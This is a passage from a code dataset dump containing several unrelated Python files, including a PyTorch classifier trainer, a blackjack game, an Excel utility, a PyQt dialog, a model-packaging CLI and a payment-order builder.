port=5005)","sub_path":"Project2/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"142217362","text":"# -*- coding: utf-8 -*-\nimport pickle\nfrom views import db\nfrom models import Product\nimport sqlalchemy\n\ndbfile = open('table_data', 'rb')\ndata = pickle.load(dbfile)\n\nfor i in range(len(data)):\n\tfor j in range(len(data[i])):\n\t\tif 'title' in data[i][j]:\n\t\t\ttitle = data[i][j]['title']\n\t\t\tcontinue\n\t\telif 'sub_title' in data[i][j]:\n\t\t\tsub_title = data[i][j]['sub_title']\n\t\t\tcontinue\n\t\tname, kkal, prots, fats, carbs = data[i][j]['name'], \\\n\t\t\tdata[i][j]['kkal'].split()[0], data[i][j]['proteins'].split()[0], \\\n\t\t\tdata[i][j]['fats'].split()[0], data[i][j]['carbohydrates'].split()[0]\n\t\tif kkal != '?' and prots != '?' and fats != '?' 
and carbs != '?':\n\t\t\tprod = Product(name, title, sub_title, kkal, prots, fats, carbs)\n\t\t\tdb.session.add(prod)\n\t\t\tdb.session.commit()","sub_path":"project/make_prod_db.py","file_name":"make_prod_db.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"634045748","text":"import numpy as np\r\nimport pandas as pd\r\nfrom collections import deque\r\n\r\n\r\n# List demo\r\nlist_1 = [3,2,1,4,7,6,5,8,9]\r\n\r\nprint(list_1)\r\nprint(type(list_1))\r\nlist_1.append(10)\r\nprint(list_1)\r\nsorted_list = sorted(list_1)\r\nprint(sorted_list)\r\nprint(list_1)\r\nlist_1.sort()\r\nprint(list_1)\r\nlist_1.pop()\r\nprint(list_1)\r\n\r\n# deque demo\r\ndouble_queue = deque([3,1,2,5])\r\nprint(double_queue)\r\ndouble_queue.append(4)\r\nprint(double_queue)\r\ndouble_queue.appendleft(0)\r\nprint(double_queue)\r\ndouble_queue.pop()\r\nprint(double_queue)\r\ndouble_queue.popleft()\r\nprint(double_queue)\r\nprint(sorted(double_queue))\r\n\r\n# dictionary demo\r\ndictionary = {'Brand': 'Ford', 'Model': 'Focus', 'Year': 2018}\r\nprint(dictionary)\r\nprint(dictionary['Brand'])\r\ndictionary['Category'] = 'Sedan'\r\nprint(dictionary)\r\ndictionary['Colours'] = ['red', 'yellow', 'black', 'white']\r\nprint(dictionary)\r\nprint(dictionary.keys())\r\nprint(dictionary.items())\r\n\r\nfor (key, item) in dictionary.items():\r\n print('The key is: ', key, ' , and item is: ', item)\r\n\r\n\r\n# tree demo\r\nclass tree:\r\n\r\n def __init__(self, data):\r\n\r\n self.left = None\r\n self.right = None\r\n self.data = data\r\n\r\n def PrintTree(self):\r\n if self.left:\r\n self.left.PrintTree()\r\n print(self.data),\r\n if self.right:\r\n self.right.PrintTree()\r\n\r\n def insert(self, data):\r\n # compare current value with parent node\r\n if self.data:\r\n if data < self.data:\r\n if self.left is None:\r\n self.left = tree(data)\r\n else:\r\n self.left.insert(data)\r\n elif data > self.data:\r\n if self.right is None:\r\n self.right = tree(data)\r\n else:\r\n self.right.insert(data)\r\n else:\r\n self.data = data\r\n\r\n # dfs algorithm\r\n # inorder treversal\r\n # Left -> root -> Right\r\n def inorder(self,root):\r\n res=[]\r\n if root:\r\n res = self.inorder(root.left)\r\n res.append(root.data)\r\n res = res + self.inorder(root.right)\r\n return res\r\n # preorder Treversal\r\n # Root -> Left -> Right\r\n def preorder(self, root):\r\n res = []\r\n if root:\r\n res.append(root.data)\r\n res = res + self.preorder(root.left)\r\n res = res + self.preorder(root.right)\r\n return res\r\n # Postorder Treverse\r\n # Left _> Right -> Root\r\n def postorder(self, root):\r\n res = []\r\n if root:\r\n res = self.postorder(root.left)\r\n res = res + self.postorder(root.right)\r\n res.append(root.data)\r\n return res\r\n\r\n# bfs to be continued\r\n# def bfs(self,visited, node):\r\n\r\n\r\n\r\n\r\nroot = tree(12)\r\nroot.insert(6)\r\nroot.insert(14)\r\nroot.insert(3)\r\nroot.insert(35)\r\nroot.insert(10)\r\nroot.insert(19)\r\nroot.insert(31)\r\nroot.insert(42)\r\n\r\n# root.PrintTree()\r\nprint(root.inorder(root))\r\nprint(root.preorder(root))\r\nprint(root.postorder(root))","sub_path":"CH2/George/HW1/Practice.py","file_name":"Practice.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"626408391","text":"import logging\nfrom logging.config import dictConfig\nimport time\nimport os\n\n\nclass CACode_log:\n logging = logging\n name = ''\n 
path = ''\n\n def __init__(self, name):\n self.name = name\n self.path = CACode_log._get_custom_file_name(name)\n dictConfig({\n 'version': 1,\n 'formatters': {'default': {\n 'format': '%(asctime)s - %(levelname)s - %(filename)s - %(funcName)s - %(lineno)s - %(message)s',\n }},\n 'handlers': {\n 'default': {\n 'class': 'logging.StreamHandler',\n 'stream': 'ext://flask.logging.wsgi_errors_stream',\n 'formatter': 'default'\n },\n 'custom': {\n 'class': 'logging.FileHandler',\n 'formatter': 'default',\n 'filename': CACode_log._get_custom_file_name(name),\n 'encoding': 'utf-8'\n },\n },\n 'root': {\n 'level': 'INFO',\n 'handlers': ['custom']\n }\n })\n\n @staticmethod\n def _mkdir(make_dir_path):\n \"\"\"\n Create the directory if it does not exist.\n :param make_dir_path: path of the file or folder\n :return: the absolute path\n \"\"\"\n\n path = make_dir_path.strip()\n if not os.path.exists(path):\n os.makedirs(path)\n return path\n\n @staticmethod\n def _get_custom_file_name(name):\n \"\"\"\n Get the absolute path of the log file.\n :return: project path + current date + '.log'\n \"\"\"\n log_dir = name + \"-log\"\n file_name = 'logger-' + \\\n time.strftime('%Y-%m-%d', time.localtime(time.time())) + '.log'\n file_folder = os.path.abspath(os.path.dirname(__file__)) + os.sep + log_dir\n CACode_log._mkdir(file_folder)\n return file_folder + os.sep + file_name\n","sub_path":"cacode_log.py","file_name":"cacode_log.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"422178663","text":"from PyQt5.QtCore import pyqtSignal\nfrom PyQt5.QtWidgets import QDialog\nfrom ui.SearchDialog import Ui_SearchDialog\n\n\nclass SearchDialog(QDialog, Ui_SearchDialog):\n def __init__(self):\n super(SearchDialog, self).__init__()\n self.setupUi(self)\n self.setup_connections()\n self.search_string = \"\"\n self.no_results_label.hide()\n\n search = pyqtSignal(str)\n delete = pyqtSignal(str)\n\n def setup_connections(self):\n self.cancel_search_button.clicked.connect(self.hide)\n self.phone_number_box.textChanged.connect(self.on_text_changed)\n self.search_button.clicked.connect(self.emit_signal)\n\n def search_dialog(self):\n self.show()\n self.search_button.setText(\"Search\")\n self.phone_number_box.setFocus()\n\n def delete_dialog(self):\n self.show()\n self.search_button.setText(\"Delete\")\n self.phone_number_box.setFocus()\n\n def hideEvent(self, hide_event):\n self.phone_number_box.clear()\n return super().hideEvent(hide_event)\n\n def on_text_changed(self, text):\n self.search_string = text\n\n def emit_signal(self):\n if self.search_button.text() == \"Search\":\n self.search.emit(self.search_string)\n else:\n self.delete.emit(self.search_string)\n self.hide()\n\n def results(self, results):\n if results:\n self.no_results_label.hide()\n else:\n self.no_results_label.show()\n","sub_path":"src/SearchDialog.py","file_name":"SearchDialog.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"261022333","text":"\n\nimport numpy as np\nfrom torch.utils.data.dataset import random_split\nfrom utils import tensor_to_numpy\nimport json\nfrom DnnDataset import DnnDataset\nfrom DnnNet import DnnNet\n\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport torch.optim as optim\nimport torch\nfrom sklearn.metrics import confusion_matrix\n\n\nclass TrainingClassifier:\n\n\n def __init__(self,metrics_dir,metrics_filename,filepath_filename,batch_size,n_epochs,lr,downsampling=True,upsampling=False,decision_threshold=0.5):\n # 
torch.manual_seed(1)\n self.metrics_dir=metrics_dir\n self.metrics_filename=metrics_filename\n self.filepath_filename=filepath_filename\n self.batch_size=batch_size\n self.n_epochs=n_epochs\n self.lr=lr\n self.downsampling=downsampling\n self.upsampling=upsampling\n self.decision_threshold=decision_threshold\n\n def load_dataset(self):\n self.data_raw=np.load(self.metrics_dir+self.metrics_filename)\n self.data_raw=dict(self.data_raw)\n\n with open(self.metrics_dir+self.filepath_filename) as data_file:\n self.list_filepath=json.load(data_file)\n\n\n self.dataset=DnnDataset(self.data_raw,self.list_filepath,downsampling=self.downsampling,upsampling=self.upsampling)\n\n\n def load_dataset_alter(self):\n\n self.data_raw = np.load(self.metrics_dir + self.metrics_filename)\n self.data_raw = dict(self.data_raw)\n\n with open(self.metrics_dir + self.filepath_filename) as data_file:\n self.list_filepath = json.load(data_file)\n\n\n def split_dataset_alter(self):\n lendata=len(self.data_raw['vae_embeddings'])\n ratio = 0.6\n train_length = int(lendata * ratio)\n validation_length = int((lendata- train_length) * 0.5)\n test_length = lendata - validation_length - train_length\n\n self.train={}\n self.validation={}\n self.test={}\n for key in self.data_raw.keys():\n self.train[key], self.validation[key], self.test[key]= np.split(self.data_raw[key],[train_length,train_length+validation_length])\n\n\n self.train_dataset=DnnDataset(self.train,self.list_filepath[0:train_length],downsampling=self.downsampling,upsampling=self.upsampling)\n self.validation_dataset = DnnDataset(self.validation, self.list_filepath[train_length:train_length+validation_length], downsampling=False,\n upsampling=False)\n self.test_dataset = DnnDataset(self.test, self.list_filepath[train_length+validation_length:train_length+validation_length+test_length], downsampling=False,\n upsampling=False)\n\n self.train_loader = torch.utils.data.DataLoader(dataset=self.train_dataset, batch_size=self.batch_size, shuffle=True)\n self.validation_loader = torch.utils.data.DataLoader(dataset=self.validation_dataset, batch_size=len(self.validation), shuffle=False)\n self.test_loader = torch.utils.data.DataLoader(dataset=self.test_dataset, batch_size=len(self.test),\n shuffle=False)\n\n self.dataset=self.train_dataset\n\n\n def split_dataset(self):\n\n ratio=0.6\n train_length= int(len(self.dataset)* ratio)\n validation_length=int((len(self.dataset)-train_length)*0.5)\n test_length=len(self.dataset)-validation_length-train_length\n\n self.train,self.validation,self.test=random_split(self.dataset,[train_length,validation_length,test_length])\n\n\n\n\n self.train_loader = torch.utils.data.DataLoader(dataset=self.train, batch_size=self.batch_size, shuffle=True)\n self.test_loader = torch.utils.data.DataLoader(dataset=self.test, batch_size=len(self.test), shuffle=False)\n self.validation_loader = torch.utils.data.DataLoader(dataset=self.test, batch_size=len(self.validation), shuffle=False)\n\n\n\n def train_model(self):\n dnn=DnnNet(deepdata=self.dataset.X_deep)\n # optimizer = optim.Adam(dnn.parameters(), lr=self.lr)\n criterion = F.binary_cross_entropy\n optimizer = optim.Adam(dnn.parameters(), lr=0.001, betas=(0.9, 0.999))\n for epoch in range(self.n_epochs):\n\n for i, ( X_deep, target) in enumerate(self.train_loader):\n X_d = Variable(X_deep).float()\n y = Variable(target).float()\n\n optimizer.zero_grad()\n y_pred = dnn(X_d)\n loss = criterion(y_pred, y)\n loss.backward()\n optimizer.step()\n if i % 1000 == 0:\n print('Epoch {} of {}, Loss: 
{}'.format(epoch + 1, self.n_epochs, loss.item()))\n\n correct = 0\n total = 0\n # with torch.no_grad():\n for i, ( X_deep, target) in enumerate(self.validation_loader):\n X_d = Variable(X_deep).float()\n y = Variable(target).float()\n y_pred = dnn( X_d)\n y_pred_cat = (y_pred > self.decision_threshold).squeeze(1).float()\n\n total += y.size(0)\n correct+= (y_pred_cat.squeeze() == y.squeeze()).sum().item()\n if i % 1000 == 0:\n print('Epoch {} of {}, ValLoss: {}'.format(epoch + 1, self.n_epochs, loss.item()))\n\n print('Validation accuracy: %d %%' % (\n 100 * correct / total))\n\n y_pred_total = []\n y_true_total = []\n\n correct = 0\n total = 0\n\n with torch.no_grad():\n for i, (X_deep, target) in enumerate(self.test_loader):\n X_d = Variable(X_deep).float()\n y = Variable(target).float()\n y_pred = dnn(X_d)\n y_pred_cat = (y_pred > self.decision_threshold).squeeze(1).float()\n\n y_pred_total.append(tensor_to_numpy(y_pred_cat).astype(int))\n y_true_total.append(tensor_to_numpy(y.squeeze(1).float()).astype(int))\n\n\n total += y.size(0)\n # correct += (y_pred_cat == y).sum().item()\n correct+= (y_pred_cat.squeeze() == y.squeeze()).sum().item()\n print(total,correct)\n print('test accuracy: %d %%' % (\n 100 * correct / total))\n\n y_pred_total = np.concatenate(y_pred_total)\n y_true_total = np.concatenate(y_true_total)\n\n\n conf = confusion_matrix(y_true_total, y_pred_total).ravel()\n print(conf / total * 100, \"Normalized value of tn fp fn tp\")\n print(conf, \"value of tn fp fn tp\")\n tn, fp, fn, tp = conf\n\n print(tp / (fp + tp), \"Precision\")\n print(tp / (fn + tp), \"Recall\")\n model_parameters = filter(lambda p: p.requires_grad, dnn.parameters())\n params = sum([np.prod(p.size()) for p in model_parameters])\n\n\n print(\"NUMBER OF PARAMETER : \" + str(params))\n\n self.net=dnn\n\n def save_model(self,filepath,name):\n torch.save(self.net.state_dict(), filepath+name)\n\n\n\n\n # def train_model_wide(self):\n # wnd = WideAndDeepNet(deepdata=self.dataset.X_deep,widedata=self.dataset.X_wide)\n # optimizer = optim.Adam(wnd.parameters(), lr=self.lr)\n # criterion = F.binary_cross_entropy\n # for epoch in range(self.n_epochs):\n #\n # for i, (X_wide,X_deep, target) in enumerate(self.train_loader):\n # X_d = Variable(X_deep).float()\n # X_w=Variable(X_wide).float()\n # y = Variable(target).float()\n #\n # optimizer.zero_grad()\n # y_pred = wnd(X_w,X_d)\n # loss = criterion(y_pred, y)\n # loss.backward()\n # optimizer.step()\n # if i % 1000 == 0:\n # print('Epoch {} of {}, Loss: {}'.format(epoch + 1, self.n_epochs, loss.data[0]))\n #\n # correct = 0\n # total = 0\n # # with torch.no_grad():\n # for i, (X_wide,X_deep, target) in enumerate(self.validation_loader):\n # X_d = Variable(X_deep).float()\n # X_w = Variable(X_wide).float()\n # y = Variable(target).float()\n # y_pred = wnd(X_w,X_d)\n # y_pred_cat = (y_pred > 0.5).squeeze(1).float()\n #\n # total += y.size(0)\n # correct += (y_pred_cat == y).sum().item()\n #\n # print('Validation accuracy: %d %%' % (\n # 100 * correct / total))\n #\n # # with torch.no_grad():\n # for i, (X_wide,X_deep, target) in enumerate(self.test_loader):\n # X_d = Variable(X_deep).float()\n # X_w = Variable(X_wide).float()\n # y = Variable(target).float()\n # y_pred = wnd(X_w,X_d)\n # y_pred_cat = (y_pred > 0.5).squeeze(1).float()\n #\n # total += y.size(0)\n # correct += (y_pred_cat == y).sum().item()\n #\n # print('test accuracy: %d %%' % (\n # 100 * correct / total))\n #\n # model_parameters = filter(lambda p: p.requires_grad, wnd.parameters())\n # params = 
sum([np.prod(p.size()) for p in model_parameters])\n #\n #\n # print(\"NUMBER OF PARAMETER : \" + str(params))\n\n\n\nif __name__=='__main__':\n\n metricsdir = '/home/ftamagna/Documents/_AcademiaSinica/dataset/TrainingData/MetricsFiles/'\n metricsfilename = 'total_metrics_training.npz'\n filepathfilename = 'total_list_filepath.json'\n\n BATCH_SIZE=256\n N_EPOCHS=300\n LR = 0.0001\n DT=0.5\n tc=TrainingClassifier(metricsdir,metricsfilename,filepathfilename,BATCH_SIZE,N_EPOCHS,LR,downsampling=False,upsampling=True,decision_threshold=DT)\n tc.load_dataset_alter()\n # for i in range(1000):\n # print(tc.dataset.Y[i],tc.dataset.list_filepath[i])\n tc.split_dataset_alter()\n\n # print(tc.dataset.Y.sum())\n print(len(tc.train_dataset.Y))\n tc.train_model()\n # tc.save_model('./','fillClassifier_20190117')\n\n\n\n\n\n\n\n","sub_path":"sketchRnn_clean_v2/tools/TrainingClassifier.py","file_name":"TrainingClassifier.py","file_ext":"py","file_size_in_byte":9943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"187328738","text":"from player import Player\nfrom deck import Deck\nfrom blackjack import Blackjack\n\nyou = Player(\"You\")\nai = Player(\"Ai\")\ngame = Blackjack(2)\n\n\ndef main_menu():\n #Get the game the player wants to play\n choice = input(\"Ready to Start?\\n\")\n if choice not in (\"n\",\"N\",\"no\",\"No\"):\n\n for i in range(5):\n print(\"\\n\")\n blackjack()\n else:\n pass\n\ndef blackjack():\n pass\n #Game Loop \n main_loop = True\n while main_loop:\n #Make Deck to Use\n use_deck = Deck()\n use_deck.shuffle_deck()\n #Deal cards to both players\n blackjackgame = Blackjack(2)\n blackjackgame.deal_cards(you,ai,use_deck)\n you.sort_hand()\n #Show Both of player cards,\n print(\"------Player Cards------\")\n blackjackgame.show_play_cards(you)\n #Hide the first dealer Card\n print(\"------Dealer Cards------\")\n blackjackgame.show_dealer_cards(ai)\n #Subloop\n hit_loop = True\n while hit_loop:\n #Ask The Player Hit or Stay\n hit_choice = input(\"Hit(H) or Stay(S)?\\n\")\n #If the player hits:\n if hit_choice == \"H\":\n pass\n #Add card to player hand\n you.add_hand(use_deck.draw())\n you.sort_hand()\n print(\"------Player Cards------\")\n blackjackgame.show_play_cards(you)\n #If the card makes the player bust\n if you.isbust():\n print(\"------Bust------\")\n #End round\n ai.clear_hand()\n you.clear_hand()\n main_menu()\n #elif player stays:\n else:\n #end this subloop, get totals of both players\n hit_loop = False\n #Dealer Draws cards\n blackjackgame.dealer_draw_loop(ai,use_deck)\n #Give a winner\n aiscore = ai.get_total()\n youscore = you.get_total()\n ai.sort_hand()\n print(\"------Dealer Final Hand------\")\n blackjackgame.show_play_cards(ai)\n if aiscore > 21:\n print(\"------Dealer Bust------\")\n elif aiscore == youscore:\n print(\"------DRAW------\")\n elif aiscore > youscore:\n print(\"------Dealer Scored Higher------\")\n elif aiscore < youscore:\n print(\"------Player Scored Higher------\")\n #Ask if the player wants to play again \n replay = input(\"Do you want to play again? 
(y/n)\\n\")\n if replay in (\"n\",\"no\",\"N\",\"No\"):\n main_loop = False\n else:\n you.clear_hand()\n ai.clear_hand()\n for i in range(5):\n print(\"\\n\")\nmain_menu()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"637578164","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 2018.02.02\n@author: wuyou\n'''\n\nfrom openpyxl import Workbook, load_workbook\nfrom contextlib import closing\nimport re\nimport sys\nfrom openpyxl.styles import Font, Color, Alignment\nfrom openpyxl.styles import colors\n\n\n\nclass operExcel():\n\n\t#读取两个指定列,并组成字典\n\tdef get_excel_name_value_dict(self, file_name, sheet_name,colname1,colname2,row_start,row_end):\n\t\tnamelist = self.colname_read_excel_return_list(file_name,sheet_name,colname1,row_start, row_end)\n\t\tvaluelist = self.colname_read_excel_return_list(file_name,sheet_name,colname2,row_start, row_end)\n\t\treturn dict(list(zip(namelist, valuelist)))\n\n\t# 按列分段读取Excel\n\tdef colname_read_excel_return_list(self, file_name, sheet_name, col_name, start, end):\n\t\twith closing(load_workbook(filename=file_name, data_only=True)) as wb:\n\t\t\tws = wb[str(sheet_name)]\n\n\t\t\tif int(start) == int(end):\n\t\t\t\tcellname = str(col_name) + str(start)\n\t\t\t\tcellValue = ws[str(cellname)].value\n\t\t\t\tcellValueList = [str(cellValue)]\n\t\t\telse:\n\t\t\t\tcellValueList = []\n\t\t\t\tfor i in range(int(start), int(end)+1):\n\t\t\t\t\tcellname = str(col_name) + str(i)\n\t\t\t\t\tcellValue = ws[str(cellname)].value\n\t\t\t\t\tcellValueList.append(str(cellValue))\n\t\t\treturn cellValueList\n\n\n\t# 获取指定sheet中行数\n\tdef get_excel_row_count(self, file_name, sheet_name):\n\t\twith closing(load_workbook(filename=file_name)) as wb:\n#\t\t\trows = wb.get_sheet_by_name(name=str(sheet_name)).max_row\n\t\t\trows = wb[str(sheet_name)].max_row\n\n\t\t\treturn rows\n\n\t#获取某列(为标记列所使用)的index,并name:index存在字典中\n\tdef get_cell_index(self,file_name, sheet_name, rowNo):\n\t\twith closing(load_workbook(filename=file_name)) as wb:\n\t\t\tsheets = wb.sheetnames\n\t\t\tif sheet_name in sheets:\n\t\t\t\tws = wb[str(sheet_name)]\n\t\t\telse:\n\t\t\t\tws = wb.create_sheet(str(sheet_name))\n\t\t\tnum = int(rowNo) - 1\n\t\t\ttagdict = {}\n\t\t\tfor cell in list(ws.rows)[num]:\n\t\t\t\tif cell.value != None:\n\t\t\t\t\tvalue = cell.value\n\t\t\t\t\tvalue = str(value)\n#\t\t\t\t\tprint \"value: \"+ value\n\t\t\t\t\tindex = cell.coordinate\n#\t\t\t\t\tprint \"index: \" + index\n\t\t\t\t\tindexlist = re.findall('[A-Z]', index)\n\t\t\t\t\tcolindex = ''.join(indexlist)\n\t\t\t\ttagdict[value] = colindex\n\t\treturn \ttagdict\n\n\tdef add_result_bytag(self,file_name, sheet_name, tagcolumnNo, dictlist):\n\t\t#excel表中得到tag列的 index,存在字典\n\t\ttagdict = self.get_cell_index(file_name, sheet_name, tagcolumnNo)\n\t\t# print 'tagdict: '\n\t\t# print tagdict\n\t\tindex_result_dict = {}\n\n\t\t#写入数据字典list长度范围内\n\t\tfor i in range(len(dictlist)):\n\n\t\t\t#去每个字典里取得tag名,result结果\n\t\t\ttagname = dictlist[i]['tag']\n\t\t\tresult = dictlist[i]['result']\n\t\t\t# print 'tagname :' + tagname\n\t\t\t# print 'result :' + result\n\t\t\t#根据tag名去excel得到的字典中,取得对应的index\n\t\t\ttagindex = tagdict[tagname]\n\t\t\t# print 'tagindex: '+ tagindex\n\t\t\t#拆分index(E2只取2,G23只取23)\n\t\t\ttagindexlist = re.findall('[0-9]', tagindex)\n\t\t\tindextmp = ''.join(tagindexlist)\n\t\t\tresult_index = 'H'+ indextmp\n\t\t\t# print 'resultindex: '+ 
result_index\n\n\t\t\tindex_result_dict[result_index]=result\n\n\t\t# print index_result_dict\n\t\t#\n\t\twith closing(load_workbook(filename=file_name)) as wb:\n\t\t\tws = wb[sheet_name]\n\t\t\tft1 = Font(name=\"微软雅黑\", color=colors.RED, size=10)\n\t\t\tft2 = Font(name=\"微软雅黑\", color=colors.GREEN,size=10, bold=True)\n\t\t\tft3 = Font(name=\"微软雅黑 Light\", size=9)\n\t\t\tfor key in list(index_result_dict.keys()):\n\t\t\t\tws[key] = index_result_dict[key]\n\t\t\t\t# print \"**********\"\n\t\t\t\t# print ws['H2']\n\t\t\t\tif index_result_dict[key] == 'FAIL':\n#\t\t\t\t\tws.cell(key).font = ft1\n\t\t\t\t\tws[key].font = ft1\n\t\t\t\tif index_result_dict[key] == 'PASS':\n#\t\t\t\t\tws.cell(key).font = ft2\n\t\t\t\t\tws[key].font = ft2\n\n\t\t\twb.save(file_name)\n\n\tdef copy_excel(self,openfile,savefile):\n\t\twith closing(load_workbook(filename=openfile)) as wb:\n\t\t\twb.save(savefile)\n\n\t# 将二维list内容按列写入到Excel\n\tdef dictList_write_excel_by_dict_key_batch(self, file_name, sheet_name, row_start, col_list, value_list_list):\n\t\twith closing(load_workbook(filename=file_name)) as wb:\n\n\t\t\tsheets = wb.sheetnames\n\t\t\tif sheet_name in sheets:\n\t\t\t\tws = wb[str(sheet_name)]\n\t\t\telse:\n\t\t\t\tws = wb.create_sheet(str(sheet_name))\n\t\t\t#ft1 = Font(name=\"微软雅黑 Light\", size=10, bold=False)\n\t\t\tft1 = Font(name=\"微软雅黑\", size=10, bold=True)\n\t\t\tft2 = Font(name=\"微软雅黑\", color=colors.RED, size=10)\n\t\t\tft3 = Font(name=\"微软雅黑\", size=10)\n\t\t\tfor i in range(len(value_list_list)):\n\t\t\t\tfor j in range(len(value_list_list[i])):\n\t\t\t\t\tcellname = col_list[j] + str(int(row_start)+i)\n\t\t\t\t\tws[str(cellname)] = value_list_list[i][j]\n\t\t\t\t\tprint(value_list_list[i][j])\n\t\t\t\t\tif str(value_list_list[i][j])==\"PASS\":\n\t\t\t\t\t\tws[str(cellname)].font = ft1\n\t\t\t\t\tif str(value_list_list[i][j])==\"FAIL\":\n\t\t\t\t\t\tws[str(cellname)].font = ft2\n\t\t\t\t\telse:\n\t\t\t\t\t\tws[str(cellname)].font = ft3\n\t\twb.save(file_name)\n\n\n#Just for test\nif __name__ == '__main__':\n\thandle = ReadWriteExcel()\n\ttemplatefile ='..//Template//Case_Flow_Base_Check.xlsx'\n\tfilename = '..\\Report\\Excel\\Case_Flow_Base_Check.xlsx'\n\tsheet_name = 'flow_base'\n\thandle.get_cell_index(filename,sheet_name,'7')\n\tdictlist=[{'tag':'flow1','result':'PASS'},{'tag':'flow2','result':'FAIL'}]\n\thandle.add_result_bytag( filename, sheet_name,'7', dictlist)\n#\thandle.copy_excel(templatefile,filename)","sub_path":"classes/operExcel.py","file_name":"operExcel.py","file_ext":"py","file_size_in_byte":5304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"548515004","text":"#\n# Copyright 2019 EPAM Systems\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport logging\nimport tempfile\nimport click\n\nfrom odahuflow.packager.helpers.constants import TARGET_DOCKER_REGISTRY, DOCKERFILE_TEMPLATE, PULL_DOCKER_REGISTRY\nfrom odahuflow.packager.helpers.docker_builder import build_docker_image, push_docker_image\nfrom 
odahuflow.packager.helpers.io_proc_utils import setup_logging\nfrom odahuflow.packager.helpers.manifest_and_resource import parse_resource_file, extract_connection_from_resource, \\\n save_result, merge_packaging_parameters\nfrom odahuflow.packager.helpers.utils import build_image_name, TemplateNameValues\nfrom odahuflow.packager.flask.data_models import PackagingResourceArguments\nfrom odahuflow.packager.flask.pipeline import work\n\n\n@click.command()\n@click.argument('model', type=click.Path(exists=True, dir_okay=True, readable=True))\n@click.argument('resource_file', type=click.Path(exists=True, file_okay=True, readable=True))\n@click.option('--verbose',\n is_flag=True,\n help='Verbose output')\ndef work_resource_file(model, resource_file, verbose):\n setup_logging(verbose)\n resource_info = parse_resource_file(resource_file)\n\n arguments = PackagingResourceArguments(**merge_packaging_parameters(resource_info))\n output_folder = tempfile.mkdtemp()\n logging.info('Using %r as temporary directory', output_folder)\n\n manifest = work(model, output_folder, arguments=arguments)\n\n # Check if docker target is set\n docker_pull_connection = extract_connection_from_resource(resource_info, PULL_DOCKER_REGISTRY)\n docker_target_connection = extract_connection_from_resource(resource_info, TARGET_DOCKER_REGISTRY)\n\n image_name = build_image_name(\n arguments.imageName,\n TemplateNameValues(Name=manifest.model.name, Version=manifest.model.version)\n )\n\n build_docker_image(\n output_folder,\n DOCKERFILE_TEMPLATE,\n image_name,\n docker_pull_connection\n )\n\n save_result(push_docker_image(image_name, docker_target_connection))\n\n\nif __name__ == '__main__':\n work_resource_file() # pylint: disable=E1120\n","sub_path":"packagers/odahuflow/packager/flask/packager.py","file_name":"packager.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"152748802","text":"import requests\nfrom json import dumps, loads\nimport time\n\nfrom datetime import date\nfrom dateutil.relativedelta import relativedelta\n\nclass Plano(object):\n planos = [{'nome': \"Power 1\", 'ID': \"10101\", 'parcelas': 1, 'preco': 60, 'codigo': 'power-1', 'aulas': 1},\n {'nome': \"Power 6\", 'ID': \"10114\", 'parcelas': 1, 'preco': 300, 'codigo': 'power-6', 'aulas': 6},\n {'nome': \"Power 12\", 'ID': \"10115\", 'parcelas': 2, 'preco': 270, 'codigo': 'power-12', 'aulas': 12},\n {'nome': \"Power 36\", 'ID': \"10116\", 'parcelas': 3, 'preco': 480, 'codigo': 'power-36', 'aulas': 36},\n {'nome': \"Power 60\", 'ID': \"10102\", 'parcelas': 5, 'preco': 360, 'codigo': 'power-60', 'aulas': 60},\n {'nome': \"Power DCC\",'ID': \"10103\", 'parcelas': 12, 'preco': 500, 'codigo': 'power-dcc', 'aulas': 999}\n ]\n\n\n def data_final(self, parcelas):\n parc = parcelas -1\n data = date.today()\n if parc > 0:\n data = data + relativedelta(days=-4)\n data = data + relativedelta(months=+parc)\n return parc, data\n\n\n\n def get_by_codigo(self, _codigo):\n result = None\n query = [ item for item in self.planos if item['codigo'] == _codigo ]\n if query:\n result = query[0]\n return result\n\n\ndef monta_pedido(cli, codigo_plano):\n\n MERCHANT_ID = '4c9e5d5c-5627-4828-ae9a-4d167a1aa57c'\n\n ordem = str(int(time.time()))\n\n \"\"\"\n Plan settings and construction of the ITEM\n \"\"\"\n pl = Plano()\n plano = pl.get_by_codigo(codigo_plano)\n\n preco = int(plano['preco']) *100\n parcelas = plano['parcelas']\n parc_final, data_final = pl.data_final(parcelas)\n\n itens = {\"Name\": plano['nome'],\n \"Description\": plano['nome'],\n \"UnitPrice\": preco,\n \"Quantity\": 1,\n \"Type\": \"Service\",\n \"Sku\": plano['codigo']\n }\n\n\n shipping = {\n \"Type\": \"WithoutShipping\"\n }\n\n pedido = { \"OrderNumber\": ordem,\n # \"SoftDescriptor\": softdesc,\n \"Shipping\" : shipping,\n \"Cart\": {\n \"Items\": [ itens ]\n } ,\n \"Customer\" : {\n \"FullName\": cli['nome'],\n \"Email\": cli['mail'],\n \"Phone\": cli['fone'] },\n \"Options\": { \"AntifraudEnabled\": False }\n }\n\n if parc_final > 0:\n 